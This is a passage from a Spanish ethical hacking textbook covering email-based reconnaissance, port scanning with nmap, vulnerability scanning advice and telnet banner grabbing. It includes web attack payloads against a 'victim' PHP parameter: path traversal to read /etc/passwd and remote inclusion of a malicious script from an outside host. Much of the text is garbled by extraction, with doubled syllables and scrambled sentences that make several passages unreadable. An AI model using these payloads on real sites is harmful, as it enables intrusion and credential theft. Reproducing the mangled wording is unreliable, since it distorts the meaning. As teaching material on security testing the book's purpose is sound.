to prime primera ra leletra del nombre nombre más apelli apellido do (ctori) (ctori) o el aclara aclarador dor modo modo nombre nombre punto punto apeapellido lli do (ca carrlos los.to .tori). ri).  Telé  Te léfo fonos: nos: para para hacer hacer llama llamadas das o adornar adornar firmas firmas falsas falsas con vin  vincen centes. tes. Direcciones: pueden pueden ser vir  vir tanto tanto para para hacer infor informa mation tion gathe gathering ring en la vida vida real como como para para inge ingenie niería ría social. social.  Tipos  Ti pos de firma firma y tipos tipos de templa templates tes de correo: correo: sir ven  ven para para confec confeccio cionar nar correos idénti idénticos cos para para otros ni veles  veles de la orga organi niza zación ción y así poner poner en marcha marcha

62

 

técni nica, ca, como como la inge ingenie niería ría social. social. otra téc Logos: para para repli replicar car logos logos simi simila lares res en caso caso de prepa preparar rar consul consultas tas con vin

centes de supues centes supuestos tos cole colegas gas o curio curiosos. sos. Contac Con tactos: tos: para para cono conocer cer puestos puestos u otros usuarios. usuarios. Meca Me canis nismos mos de cifra cifrado: do: por ejemplo, ejemplo, en una firma firma puede puede estar estar un ID PGP. Si un intru intruso so da con un usuario usuario de una orga organi niza zación ción con esa firma, firma, auto automá mátitica ca mente men te ra va comu a saber sa ber quela ese usua usuario rioespe ma neja rá informa infor sensible ble que debe cifrar pa para co muni nicar carla y centra cen trará rá esmane pecial cialjará aten atención ciónmación ención él. sensi  Aplica  Apli cacio ciones: nes: los conte conteni nidos dos suelen suelen ir firma firmados dos por otros tipos tipos de aplica aplicacio ciones. nes. Otra infor informa mación: ción: también también pode podemos mos encon encontrar trar el (Campo (Campo CC:) CC:) Otr Otros os usua usuarios rios de la orga organi niza zación: ción: al soli solici citar tar copias copias o reen víos y al pro probar barlos los como como usuario usuario de siste sis tema, ma, compro comprobar bar su actual actual existen existencia cia en la empre empresa. sa.  Tramos  Tra mos de red inter internas: nas: algu algunos nos e-mails dan los nombres nombres de máqui máquinas nas de una red inter interna na y sus respec respectiti vas  vas direc direccio ciones nes IP. En caso caso de que el intru intruso so no encuen encuentre tre códi código go fuente fuente de este este tipo tipo median mediante te GooGoogle, sóna sólo lo de tiene tiene pre pregun alcontró. gotró. ligado liga do oraún gani niza zación ción a tir un omail de con tacto toriao a algu alguna lasque casillas casi llasguntar quetarencon enalgo Noatiene tielaneorga que men mentir utilizar utili zarcontac ingenie inge nieria social, so cial, tema tema que aborda abordare remos mos en el próxi próximo mo capí capítu tulo. lo. Por ejemplo, ejemplo, si la orga organi niza zación ción vende vende máqui máquinas nas agrope agropecua cuarias rias y se le pregun pregunta ta el costo cos to de una o la forma forma de pago, pago, no nece necesa saria riamen mente te se está está enga engañan ñando do o mintien mintien-do al recep receptor tor en cuanto cuanto a conte conteni nido, do, sal vo  vo in indi direc recta tamen mente te en la inten intención ción poste poste-rior del intru intruso. so. Éste Éste segu segura ramen mente te va a escri escribir bir algu alguna na consul consulta ta a la casi casilla lla de correo correo info in fo@do @domi minio nio vic  victitima ma.com .com y espe espera rará rá una respues respuesta ta para para anali analizar zar su códi código go fuente fuente y, así, obte obtener ner ese tipo tipo de infor informa mación. ción.

Esca Es caneo neo y finger fingerprin printing ting En algu algunos nos luga lugares, res, estas estas técni técnicas cas se descri describen ben por sepa separa rado do de lo que es infor informa mation tion gathe gat hering. ring. En este este caso caso no, ya que el ejecu ejecutor tor a tra vés del del esca escaneo neo y finger fingerprin printing ting no deja de ja de reco recopi pilar lar infor informa mación ción (bastan (bastante te signi signififican cante) te) al asestar asestar un esca escaneo neo a los hosts (mapeo (ma peo de red) del obje objetiti vo  vo o al al pro proce cesar sar la infor informa mación ción que brinda brinda éste éste como como resul resulta ta-do. El intru intruso so o el profe profesio sional nal ético, ético, a tra vés del em empleo pleo de las técni técnicas cas ante anterio riores, res, ha logra lo grado do ubicar ubicar en Inter Internet net a la orga organi niza zación ción obje objetiti vo  vo median mediante te rangos rangos de direc direccio cio-nes IP yestos dotos minios. nios. Aunbusca Aunque quecará serágura segu mente dispone ne de otra infor informa mación ción más deta detalla lla-da, con esdomi mé méto todos dos bus coramen cono nocer: cer:te dispo • Si los los hosts hosts (PC y ser ser vers)  vers) de una red o de deter termi mina nado do rango rango de Inter Internet net están están vivi vos (funcio (fun cionan nando) do) a tra vés de un net work  work scanning scanning o esca escaneo neo de red. Gracias Gracias a 63

 

éste, también éste, también podrá podrá resol resol ver  ver sus nombres nombres y direc direccio ciones nes IP e, inclu incluso, so, podrá podrá loca loca-lilizar zar deter determi mina nado do nombre nombre de host o termi terminal nal dentro dentro del rango. rango. scanning: qué puertos •  A tra vés de un port scanning: puertos están están abiertos, abiertos, filtra filtrados dos o cerra cerrados. dos. Por otro lado, lado, también intentará averiguar qué tipo tipo y versión versión de aplica aplicación ción está está corrien co rriendo do en esos puertos puertos y qué ser vicios.  vicios. finger prin  printing: ting: qué siste • Con el finger sistema ma opera operati ti vo,  vo, versión versión de aplica aplicación ción o kernel kernel poposee el ser vidor  vidor vi vo.  vo. vulnera rabi bility lity scanning scanning po • Con el vulne podrá drá cono conocer cer descui descuidos dos de admi adminis nistra tración ción o  vulne  vul nera rabi bililida dades des pre via  viamen mente te cono conoci cidas. das.  Ahora veamos  Ahora veamos las respues respuestas tas a dos pregun preguntas tas impor importan tantes. tes. ¿Cómo ¿Cómo se efectúa, efectúa, técni técnica ca-mente, men te, el esca escaneo neo de puertos puertos y con qué herra herramien mientas tas se lle va a ca cabo? bo? En primer primer lugar, lugar, para pa ra enten entender der el concep concepto to hay que tener tener pleno pleno cono conoci cimien miento to de la fami familia lia de proto protoco co-los TCP/IP. TCP/IP. Igualmen Igualmente, te, veamos veamos lo que signi signifi fica ca esca escaneo neo de puertos puertos TCP SYN según según  Wiki  Wi kipe pedia dia “Para esta “Para estable blecer cer una cone conexión xión normal normal TCP, es nece necesa sario rio seguir seguir una nego negocia ciación ción de tres pasos. pasos. Esta Esta nego negocia ciación ción es inicia iniciada da con un paque paquete te SYN en la máqui máquina na de oriorigen, al que la máqui máquina na de desti destino no corres correspon ponde de con un paque paquete te SYN/ACK, SYN/ACK, que es final fi nalmen mente te respon respondi dido do por la máqui máquina na que inicia inicia la cone conexión xión por un paque paquete te ACK. Una vez que se han cumpli cumplido do estos estos pasos, pasos, está está hecha hecha la cone conexión xión TCP. Un rastrea rastreador dor de puertos puertos en vía mu muchos chos paque paquetes tes SYN a la máqui máquina na que se está está proban pro bando, do, y mira mira de qué forma forma regre regresan san los paque paquetes tes para para ver el esta estado do de los puerpuertos en el desti destino, no, inter interpre pretán tándo dolos los de la siguien siguiente te forma: forma: - Si al en viar un pa paque quete te SYN a un puerto puerto espe especí cífi fico, co, el desti destino no de vuel ve  ve un SYSY N/ACK, el te puer puerto to está es abier abierto y escu es chando conexio cone xiones. nes. Enregre caelso, rete, regre gresa un paque paquete RST, eltápuerto puer toto está está cecuchan cerra rrado. do. do - Por último, últi mo, si -no reotro gresa sacaso, pasi paque quete, osi se reci recibe be un paque paquete te ICMP Port Unrea Unreacha chable, ble, el puerto puerto está está filtra filtrado do por algún algún tipo ti po de corta cortafue fuegos. gos. Hacien Ha ciendo do este este proce procedi dimien miento to para para una lista lista de puertos puertos cono conoci cidos, dos, se logra logra obte obtener ner un infor informe me de esta estado do de los puertos puertos de la máqui máquina na proba probada.” da.”  p://es.wiki ki pedia.org  pedia.org/wi /wiki/Es ki/Escá cáner ner _de  _de _puer  _puertos tos En: htt p://es.wi  Veamos  Vea mos un lista listado do de puertos: puertos: Núme Nú mero ro de puert puerto 1 5 7 18 20 21

Descrip cripción ción

TCP Port Servi vice ce Multi Multiple plexer xer TCPMUX TCPMUX Remote Remo te Job Entry (RJE) ECHO Message Messa ge Send Proto Protocol col (MSP) FTP – Da Data ta FTP – Con Control trol

64

 

22 23 25 29 37 42 43 49 53 69 70 79 80 103 108 109 115

SSH Re Remo mote te Login Login Proto Protocol col Telnet Telnet Simple Mail Transfer Simple Transfer Prot Protocol (SMTP) MSG ICP Time Time Host Na Name me Server Server (Name (Nameserv) serv) WhoIs Login Host Proto Login Protocol col (Login) (Login) Domain Name Domain Name System System (DNS) Trivial File Trivial File Transfer Transfer Proto Protocol col (TFTP) Gopher Servi Gopher Services ces Finger Finger HTTP X.400 Stan Standard dard SNA Ga Gate teway way Access Access Server Server POP2 110 POP3 Simple File Simple File Transfer Transfer Proto Protocol col (SFTP)

Núme Nú mero ro de puert puerto

Descrip cripción ción

118 119 137 139 143 150 156 161 179

SQL Ser Servi vices ces Newsgroup (NNTP) Newsgroup NetBIOS Name NetBIOS Name Servi Service ce NetBIOS Data NetBIOS Datagram gram Servi Service ce Interim Inte rim Mail Access Access Proto Protocol col (IMAP) NetBIOS Session NetBIOS Session Servi Service ce SQL Ser Server ver SNMP Border Gate Border Gateway way Proto Protocol col (BGP)

190 194 197 389 396 443 444 445 458

Gate Ga teway way Access Access Control Control Proto Protocol col Internet Inter net Relay Relay Chat (IRC) Directory Direc tory Loca Location tion Servi Service ce (DLS) Lightweight Direc Lightweight Directory tory Access Access Protocol Novell Netwa Novell Netware re over IP HTTPS Simple Network Simple Network Paging Paging Proto Protocol col Microsoft-DS Micro soft-DS Apple QuickTi Apple QuickTime me

 Material adicional sobre escaneos

Pa Para ra cono conocer cer más sobre sobre el compor comporta tamien miento to a ba jo nivel nivel de las aplica aplicacio ciones nes y siste sistemas mas opera ope rati tivos vos y la interactuacion de protocolos y capas, visiten: www.synnergy www.synnergy.net .net/down /down--

loads/pap loads/pa pers/ o visi sitar tar www.hpn-sec.net www.hpn-sec.net/deat /death/ar h/arti ticles cles/sa /sabue buesos sos/Sa /Sabue buessos.pdf y www.hackpr www .hackpr.net .net/fi /files les/tex /text/a t/ana nali lisis-re sis-remo moto-de-sis to-de-siste temas.txt. mas.txt.

65

 

546

DHCP Client

547

DHCP Ser Server ver

563

SNEWS

569

MSN 1080 Socks

Well known ports. Puertos Puertos cono conoci cidos dos hasta hasta 1024, reser reserva vados dos para pa ra servi servicios cios de privi privile legio. gio. La lista lista comple completa ta de puertos puertos regis registra trados dos o priva privados dos y diná dinámi micos cos está está en www.ia www.iana.or na.org/as g/assign signments ments /port-numbers.  /port-numbers. Puertos.

No pode podemos mos deta detallar llar aquí cómo cómo se compor comportan tan a bajo bajo ni vel  vel toda todass las apli aplica cacio cio-nes y siste sistemas mas opera operati ti vos,  vos, ni có cómo mo inte interac ractúan túan los proto protoco colos los de comu comuni nica cación ción y sus capas, ca pas, ya que no queda quedaría ría espa espacio cio para para deta detallar llar las técni técnicas cas bási básicas cas de hachacking ético. ético. Por ello, a lo largo de toda la obra iremos recomendando una se rie de recur recursos sos a los que se puede puede acudir acudir para para obte obtener ner más mate ma terial. rial. La mayo mayoría ría de esos méto métodos dos se lle va a ca cabo con las herra herramien mientas tas que ofrece ofrece el exce excelen len-te Nmap. En cuanto cuanto al vulne vulnera rabi bility lity scanning, scanning, si bien es reco recomen menda dable ble hacer hacerlo lo a mamano según según el siste sistema ma –apps, plata platafor forma ma y version-, version-, pode podemos mos utili utilizar zar produc productos tos de wwww w.eeye  w.ee ye.com .com y ww w.a  w.app ppse secinc cinc.com. .com. Entre Entre otros, es posi posible ble usar Nessus Nessus (www.nes (www.nessu su-s.org/down s.org /downloa load/in d/index.php), dex.php), scripts en Perl, Python Python y aplica aplicacio ciones nes tanto tanto open source source como co mo win32. que al ser éstos éstos comer comercia ciales, les, se debe deberá rá pagar pagar una licen licencia cia para para su utili utiliza za-ción.

Aquí se ve la ejecu ejecució ción n de nma nmap p con contra tra un host, dando dando como como resul resulta tado do los servi servicios cios dispo disponi nibles bles (puertos (puertos abiertos abiertos y uno filtra filtrado), do), su direc dirección ción IP y su esta estado do Up. NMAP.

La insta instala lació ción n de nmap nmap es muy muy simple. simple. Luego Luego de descar descargar garlo lo desde desde http://in http://inse secu cu-re.org/nmap re.org/n map/down /download.html, load.html, basta basta con hacer hacer doble doble clic sobre sobre el insta instala lador dor en cacaso de que sea la versión versión Windows. Windows. Para Para las versio versiones nes de Unix, Linux Linux y Sola Solaris, ris, luelue66

 

go de descom descompri primir mir el archi archi vo  vo y me meter terse se en su path (direc (di recto torio), rio), ingre ingresa samos: mos: $ ./configure $ make $ make install

 Aunque pode  Aunque podemos mos consul consultar tar el man (ayuda) (ayuda) de nmap o en una lista lista de correo, correo, cocomo http://cgi.in http://cgi.inse secu cure.org re.org/mail /mailman man/lis /listin tinfo/n fo/nmap-hac map-hackers, kers, veamos veamos unos ejemejemplos de esca escaneos neos en nmap (reempla (reemplazar zar IP con la direc di rección ción correc correcta): ta): • Lista tado do de puertos: puertos: nmap –sS IP • Barri rrida da de rango: rango: nmap –sS 200.**.0.2-200 (esca (escanea nea ese rango rango de 2 a 200). • Barri rrida da de rango rango buscan buscando do los puertos puertos SSH, Netbios, Netbios, FTP y Telnet: Telnet: nmap –sS  –p 22,21,139,23 200.**.0.2-200 • Obte tener ner siste sistema ma opera operati ti vo:  vo: nmap -O –v IP • Versio siones nes de ser vicios:  vicios: nmap -T Aggres Aggressi si ve  ve -sV -n -O –v IP

GUI.

UMIT UM IT (h (htt ttp://u p://umit mit.sour .source cefor forge ge.net), .net), la agradable inter interfaz faz gráfi gráfica ca para para nmap. Ahora llamada Zenmap.

 Ahora veamos  Ahora veamos una serie serie de conse consejos jos en cuanto cuanto al vulne vulnera rabi bility lity scanning scanning o búsque búsqueda da de vulne vulnera rabi bililida dades des de modo modo auto automa mati tiza zado do con un escá escáner ner (del tipo tipo Reti Retina): na): • Hay que enten (princi cipal palmen mente te tener tener entender der qué es lo que busca busca esta esta herra herramien mienta ta (prin claro cla ro el concep concepto to comple completo to sobre sobre vulne vulnera rabi bililida dades, des, sus clases clases e impac impacto to en lo téctécnico), ni co), que función función cumple cumple en nuestro nuestro traba trabajo jo y qué puede puede brindar brindarnos nos su búsque búsqueda da 67

 

como resul como resulta tado. do. Esca Es canear near sin más no tiene tiene senti sentido do en un chequeo chequeo de segu seguri ridad dad serio. serio. • No hay que poner po nerlo lo a funcio funcionar nar con una confi configu gura ración ción por defec defecto. to. Esto significa que la herra herramien mienta ta debe debe estar estar siempre siempre adecua adecuada da al obje objeti ti vo.  vo. Si bien existen exis ten infi infini nidad dad de herra herramien mientas, tas, en su módu módulo lo de seteo seteo (Settings (Settings u Opcio Opcio-nes) o bien en el mismo mis mo códi código go fuente, fuente, a la mayo mayoría ría se le puede puede opti optimi mizar zar sus diccio dic ciona narios rios (cambiar (cambiar admi adminis nistra trator tor por admi adminis nistra trador dor por ejemplo ejemplo en un cacaso de fuerza fuer za bruta) bruta) si el siste sistema ma obje objeti ti vo  vo es está tá en idioma idioma espa español ñol debi debido do a sus cuentas cuen tas de siste sistema. ma. Si esta esta herra herramien mienta ta reali realiza za búsque búsqueda da de direc di recto torios, rios, debe debe-rá ser amplia ampliado do sobre sobre su propia propia base, base, alinear alinearlo lo a los posi posibles bles paths que pueda pueda llegar lle gar a tener tener el sitio sitio y que, de momen mo mento, to, desco descono noce cemos. mos. • No confiar confiar plena plenamen mente te en todo todo el out put  put o re resul sulta tado do del análi análisis sis (por los falsos fal sos posi positi ti vos  vos y los erro errores res no repor reporta tados). dos). • Che Chequear quear cosas cosas a mano mano (tel (telne netear, tear, buscar buscar infor informa mación ción o gene generar rar errores errores a mamano), ya que no existe ninguna herra herramien mienta ta que se compa compare, re, siquie siquiera ra míni mínima mamen men-te, a nuestra nuestra imagi imagina nación. ción. Descar cartar tar los módu módulos los de chequeo chequeo de la herra herramien mienta, ta, donde ob via  viamen mente, te, • Des esas vulnerabilidades no se encuentran por lógica en el obje ob jeti ti vo.  vo. Es Esto to es para pa ra no DOSear DOSearlo lo (crearle (crearle denia deniales les de ser vi  vicio cio no espe espera rados, dos, conges congestio tionar narlo). lo). Por ejemplo: ejemplo: no vale vale la pena pena esca escanear near por vulne vulnera rabi bililida dades des en Apache Apache si nuestro nuestro  webser  web ser ver  ver es un IIS. En este este caso, caso, debe debería ríamos mos desha deshabi bililitar tar (en caso caso de que lo tutu viera)  vie ra) el módu módulo lo Apache Apache de nuestra nuestra herra herramien mienta. ta. Utili lizar zar varias varias herra herramien mientas tas o produc productos: tos: co • Uti comer mercia ciales, les, open source source y pri va vados. En lo posi posible ble conviene hacerlo desde desde dife diferen rentes tes plata platafor formas mas y siste sistemas mas opeoperati ra ti vos.  vos. Cada Cada uno posee posee su versa versati tililidad dad y recur recursos. sos.

• In yec  yectar tar todo todo ti po  po de cosas cosas en los querys php, desde desde carac caracte teres res espe especia ciales les hashasta direc direccio ciones nes web con scripts que ejecu eje cuten ten coman comandos, dos, de modo modo auto automa mati tiza zado do y  a mano. mano. Estos Estos querys son las llama llamadas das hacia hacia archi archi vos  vos o varia variables bles que hacen hacen algu algu-nos scripts .php en el ser vi  vidor, dor, como como por ejemplo: ejemplo: si sitio tio vic  victi tima ma/fi /file.ph le.ph p?id=34 (llama (lla ma a una varia variable), ble), si sitio tio vic  victi tima ma/fi /file.php le.php?fi ?file=en le=encues cuesta.htm ta.htm (lla (llama ma a un ararchi vo).  vo). Su Supon ponga gamos mos que luego luego del carác carácter ter = colo coloca camos mos comi comillas llas simples simples o URLs scripts paforma para ramación ejeción ejecu cutar tarnos comandos coman dos  vi dor simdaría simple plemen mente, te, así generar gene errores erro rescon y ver qué infor in de vuel  veeneste  ve eselteser ob vidor obje jeti ti vo.  vo.o,Queda Que ría algo algo enrar el browser, brow ser, luego luego de lo que presio presiona namos mos la tecla tecla Enter: Enter:

sitio vic sitio  victi tima ma/fi /file.php le.php?fi ?file=’ le=’ sitio si tio vic  victi tima ma/fi /file.php le.php?fi ?file=../../../../../etc le=../../../../../etc/passwd /passwd sitio si tio vic  victi tima ma/fi /file.php le.php?fi ?file=/etc le=/etc/passwd00% /passwd00% sitio si tio vic  victi tima ma/fi /file.php le.php?fi ?file=www le=www.si .sitio tiode de po  pora rahi hi.com/s .com/script criptma malig ligno.php no.php sitio si tio vic  victi tima ma/fi /file.php le.php?fi ?file=www le=www.si .sitio tiode de po  pora rahi hi.co .com/ar m/archi chi voasu  voasubir bir.gif  .gif  sitio si tio vic  victi tima ma/fi /file.php le.php?fi ?file le=si =sitio tio vic  victi tima ma/fi /file.php le.php 68

 

sitio tio vic  victi tima ma/fi /file.php le.php?fi ?file le=fi =file.php le.php si sitio si tio vic  victi tima ma/fi /file.php le.php?fi ?file le=cual =cualquier quier cosa cosa para para gene generar rar errores errores o lograr lograr alalgo ines pe  pera rado do en la aplica aplicación ción

Ninguna Ningu na herra herramien mienta ta de búsque búsqueda da auto automa mati tiza zada da de vulne vulnera rabi bililida dades des se compa compara ra a la imagi imagina nación ción y reso resolu lución ción de un huma humano no en este este tipo tipo de tarea. tarea. La herramienta será se rá rápi rápida da y secuen secuencial, cial, pero pero es inca incapaz paz de discer discernir nir qué error come cometió tió el progra progra-mador ma dor o el admi adminis nistra trador. dor. Sólo Sólo encon encontra trará rá descui descuidos dos típi típicos, cos, posi posibles, bles, cono conoci cidos dos de ante antema mano. no. Un chequeo chequeo de segu seguri ridad dad basa basado do sólo sólo en herra herramien mientas, tas, siste sistemas mas opera ope rati ti vos  vos y ex exploits, ploits, sin una mente mente analí analíti tica ca (o varias) varias) detrás, detrás, no es más que un chequeo che queo de descui descuidos dos típi típicos. cos. Los descui descuidos dos más impor importan tantes tes son los que son fruto fru to de ese siste sistema ma y las partes partes in vo  volu lucra cradas. das. Entre Entre los descui descuidos dos típi típicos, cos, pode pode-mos mencio mencionar: nar: si sitio tio vic  victi tima ma/ro /robots.txt bots.txt, si sitio tio vic  victi tima ma/bac /backup/ kup/ y si sitio tio vic  victi ti-ma/u ploa  pload.asp. d.asp. • Pro Probar bar técni técnicas cas de evasión evasión, de modo modo auto automa mati tiza zado do y a mano. mano. • Pla Plani nifi ficar car un mode modelo lo/pa /patrón trón de búsque búsqueda. da. Si es un obje objeti ti vo  vo onli online ne (sitio) (sitio) papara venta venta de cacho cachorros rros (perros), (perros), buscar buscar los posi posibles bles paths /cacho /cachorros/, rros/, /backup /backup canes/, ca nes/, /can/, archi archi vos  vos como: co mo: plani planilla lla _pe  _perros.xls, rros.xls, perros.mdb, perros.mdb, base-pe base-perros.mdb rros.mdb y así hasta hasta donde donde nos permi permita ta la imagi imagina nación ción o el tiempo. tiempo. En el mismo mismo ejemplo, ejemplo, como co mo pass words de usuarios usuarios de correo correo le agrega agregamos mos a la herra herramien mienta ta de compro compro-bación ba ción la lista lista de perros perros de la asocia asociación ción cani canina na mundial mundial más sultan, sultan, boby, negra, negra,

mora, chunchu mora, chunchuna, na, atila, atila, entre entre otros más comu comunes nes como como lassie, lassie, rintin rintintin tin y laika. laika. • Lue Luego go de lo plani planifi fica cado, do, inten intentar tar otras cosas cosas sobre sobre la base base de aquello que surja sur ja y tomar tomar apuntes, apuntes, anali analizar zar resul resulta tados dos en todos todos los tiempos tiempos (antes, (antes, duran durante te y  después). des pués).

 Anécdota nécdota

La aplica aplicación ción de la Figu Figura ra 13 13 se lla llama ma R3x, era gratui gratuita ta en 1999. Fue desa desarro rrolla llada da por el ruma rumano no Bodgan Bodgan Calin, Calin, con quien cola colabo boré ré como como beta betates teste terr re repor portan tando do sus falsos falsos popositi si tivos. vos. En la actua actuali lidad, dad, su nuevo nuevo nombre nombre es GFI LANguard LANguard Network Network Secu Security rity Scanner, Scanner, y se trata trata de una herra herramien mienta ta comer comercial cial mucho mucho más comple comple ja y reco re cono noci cida. da.

69

 

R3X.

Ejemplo Ejem plo de un esca escaneo neo de recur recursos sos compar comparti tidos dos

a través través de netbios netbios y su visua visuali liza zación ción remo remota ta a través través de Inter Internet net Explo Explorer. rer.

La búsque búsqueda da de la vulne vulnera rabi bililidad dad o descui descuido do debe debe ser lógi lógica ca e ilógi ilógica, ca, ya que éstos éstos puepueden ser grotes grotescos cos o suti sutiles. les. Poner Ponerse se a pensar pensar y plani planifi ficar car en este este aspec aspecto to una hora hora anantes de hacer hacer la emula emulación ción del emba embate, te, puede puede ahorrar ahorrarnos nos treinta treinta luego luego del comien comienzo. zo.

Telneteo Esto es la búsque búsqueda da a mano, mano, de banners banners y otra infor informa mación. ción.  Telne  Tel netear tear es un modis modismo mo que signi signifi fica ca utili utilizar zar un cliente cliente telnet telnet (aplica (aplicación ción para para ejecu eje cutar tar coman comandos dos telnet) telnet) a tra vés de una lílínea nea de coman comandos dos (ya sea un prompt MS-DOS o una shell linux li nux o unix), para para conec conectar tarse se a ser vi  vicios cios (puertos) (puertos) de un sissistema te ma remo remoto to y así obte obtener ner infor informa mación ción de éste éste o a tra vés de éste. és te.  Vaya  Va yamos mos al princi principio. pio. Con un cliente cliente telnet telnet no podre podremos mos conec conectar tarnos nos a un ser vi vidor SSH (puerto (puerto 22, por defec defecto) to) y mante mantener ner una sesión sesión normal. normal. Son dife diferen rentes tes proto pro toco colos, los, y siempre siempre hay que respe respetar tar el proto protoco colo. lo. No se puede puede conec conectar tar via cliente clien te FTP a un puerto puerto ser vidor  vidor POP3, ya que ello sería sería como como querer querer transmi transmitir tir agua por los cables cables de electri electrici cidad. dad. Por otro lado, lado, un puerto puerto abierto abierto no es sinó sinóni nimo de un puerto puerto por donde donde se puede puede entrar entrar lite literal ralmen mente te al ser vidor  vidor o algún algún comcomponen po nente te opera operati ti vo  vo del sis siste tema. ma. Es sola solamen mente te un ser vi  vicio cio que, en el caso caso de reque reque-rir auten autenti tifi fica cación ción (que deba deba colo colocar carse se allí nombre nombre y pass word para pa ra iniciar iniciar una sesesión el xión sistema), siste ma), de berá rádor utiylizar utili zarse clien cliente tetener ade adecua dosesión su correc co rrecta ta sinta sintaxis xis papara suen conexión cone en eldebe ser  vidor  vi pose poder derun así, man mante nercuado una seysión nor normal. mal. 70

 

Prompt. Po PowerCmd werCmd (www.po (www.powercmd wercmd.com) .com) es una herra herramien mienta ta que podría podría

reemplazar reempla zar de un modo modo me jo  jora rado do al intér intérpre prete te de coman comandos dos de Windows Windows (cmd.e (cmd.exe). xe). Posee Po see un siste sistema ma de regis registros tros auto automa mati tiza zados dos y edición edición de texto, texto, como como también también suge su geren rencias cias en tiempo tiempo real y un entor entorno no agrada agradable ble a la vista, vista, entre entre otras cosas. cosas.

 Telnetear  Telne tear sir ve  ve enton entonces ces sólo sólo para para mirar mirar qué hay en ese ser vi  vicio, cio, y gene general ralmen mente te se  ven só sólo lo los ban banners ners, que son unos peque pequeños ños carte carteles les con infor informa mación ción del ser vicio  vicio, una bien ve  veni nida, da, algún algún que otro dato dato impor importan tante te (como (como pasa pasa en el puerto puerto de finger finger 79) o nada. nada. Lógi Lógica camen mente, te, no se va a telne telnetear tear a un puerto puerto que apare aparece ce cocomo cerra cerrado do filtra filtrado do o cerra cerrado do luego luego de un esca escaneo neo de nmap. Cuando Cuan do se conec conecta ta el cliente cliente telnet telnet a un puerto puerto abierto, abierto, la mayo mayoría ría de las veces veces da la infor in forma mación ción sin intro introdu ducir cir más que un Enter, Enter, un /w y enter enter en el caso caso de algu algunos nos ser vicios  vicios Fin Finger ger, un help o ? en otros. Para Pa ra enten entender derlo, lo, veamos veamos algu algunos nos ejemplos. ejemplos. •  Al ser vi  vicio cio FTP: cone co nexión: xión: telnet telnet ip vic  victi tima ma 21 respues res puesta: ta: 220 dominiovictima niovictima. .com.ar FTP server (Version wu-2.6.2(2) Mon Aug 25 15:08:21 ART 2003) ready.

 Aquí vemos vemos que nos da la versión versión y el nombre nombre del ser vi  vidor, dor, desde desde 220 hasta hasta ready  es el banner banner mostra mostrado. do. •  Al ser vi  vicio cio telnet telnet (puerto (puerto 23): 71

 

cone nexión: xión: telnet telnet ip vic  victi tima ma co respues res puesta: ta: Try ryin ing g ipvi vict cti ima... Connected to ipvictima. Escape character is ‘^]’. ** ACCESO RESTRINGIDO A TODO USUARIO AJENO A XXXX ** Use sern rna ame me: : admi min n Password:  Aquí pode podemos mos ver que es un ser vi  vidor dor en el que se puede puede auten autenti tifi ficar car remo remota tamen men--

te, y su cartel cartel de aviso aviso o banner banner de auten autenti tifi fica cación. ción. •  Al ser vi  vicio cio SSH que se encuen encuentra tra por defec defecto to en el puerto puerto 22: cone co nexión: xión: telnet telnet ip vic  victi tima ma 22 respues res puesta: ta: SSH-2.0-OpenSSH_3.8.1p1 Prot Pr otoc ocol ol mi mism smat atch ch. . Se ha perdido la l a co nexión co n el host. Aqu í d a la versió n y e l tipo de ser ver SSH.

• Al se ser vi  vicio cio Finger Finger (puerto (puerto 79): Ejemplo Ejem plo 1: Cone Co nexión: xión: telnet telnet ip vic  victi tima ma 79 Respues Res puesta: ta: Tryi Tr ying ng ip ipvi vict cti ima... Connected to ipvictima. Esc sca ape cha har rac acte ter r is ‘^] ^]’. ’. ************************************* ************************************* **

**

**

Bienvenido a Internet

**

XXXXX

**

**

************************************* ************************************* NODO XXX Lin Li ne

User

* 66 vt vty y 0

Host(s) idle id le

Conn Co nnec ecti tion on cl clo osed by foreign host.

Ejemplo Ejem plo 2: 72

 

Cone nexión: xión: telnet telnet ip vic  victitima ma 79 Co Respues Res puesta: ta: Trying ipvictima...

Idle Location IPCO IP CON NEC ECTA TADA DA

Connecte Connec ted d to ip ipvi vict ctim ima. a. Esc Es cap ape e cha chara ract cter er is ‘^ ‘^] ]’. Line Lin * 66 vty 0 Interface

User User

Host(s) idle Mode

Idle Location 00:00:00 IPCONECTADA Idle Peer Address

Se0 Se 0/1

Syn ync c PP PPP P

00:0 00 :00: 0:00 00 10 10.1 .10. 0.0. 0.4 4

Se0 Se 0/3

Syn ync c PP PPP P

00:0 00 :00: 0:03 03 10 10.1 .10. 0.0. 0.9 9

 Toda esta  Toda esta infor informa mación ción que nos muestran muestran los ser vicios  vicios o puertos puertos telne telnetea teados dos es imimportan por tante te para para discer discernir nir cómo cómo seguir seguir el ataque ataque o proce procedi dimien miento to de chequeo. chequeo. El inintruso, tru so, para para telne telnetear, tear, es muy proba probable ble lo haga desde desde una shell inter interme media dia a su mámáquina, qui na, es decir, decir, que prime primero ro se conec conecte te a una máqui máquina na (o más) que se encuen encuentre tre pre via  viamen mente te compro comprome metitida da y que, desde desde ahí, trate trate de ver cada cada uno de los ser vicios  vicios del obje objetiti vo  vo (pri (prime mero ro esca escanean neando do todos todos sus ser vicios  vicios dispo disponi nibles, bles, luego luego a mano mano aquellos aque llos que consi conside dere re inte intere resan santes tes para para ver dete deteni nida damen mente). te). Lo hace hace de esta esta mamanera ne ra para para sal vaguar  vaguardar dar su identi identidad dad en la red y no dejar dejar su real IP graba grabada da en el obobjetiti vo. je  vo. Él intru intruso so posee posee todo todo el tiempo tiempo del mundo mundo para para este este tipo tipo de busque busqueda da arte arte-sanal, sa nal, a compa compara ración ción de los tiempos tiempos y otros recur recursos sos acota acotados dos que tienen tienen los conconsulto sul tores res o pentes pentesters ters de una orga organi niza zación ción formal. formal. Ésa es otra de las venta ventajas jas que eseste tipo tipo de atacan atacantes tes tiene tiene si compa compara ramos mos el emba embate te entre entre uno y otro. Por tal moti moti vo,  vo, es reco recomen menda dable ble que las orga organi niza zacio ciones nes manten mantengan gan el control control de la segu se guri ridad dad median mediante te constan constantes tes contro controles les y chequeos, chequeos, y no sólo sólo por única única vez o de modo mo do acota acotado do por lapsos lapsos hora horarios. rios. Por ejemplo, ejemplo, una pauta pauta con el consul consultor tor del titipo Pe Pene netra tration tion test de sólo sólo 80 horas. horas. En las técni técnicas cas a mano, mano, no es reco recomen menda dable ble guiarse guiarse el 100% en white whitepa papers pers o dududosos do sos tuto tutoria riales les que encon encontra tramos mos por ahí, sino sino que siempre siempre hay que inten intentar tar algo algo Progra  mas recomendados Progra Como cliente Como cliente de cone conexión xión del tipo tipo telnet, telnet, SSH o rlogin, rlogin, es reco recomen menda dable ble la muy útil aplica apli cación ción Secu SecurreCRT (www.vandy .vandyke ke.com). 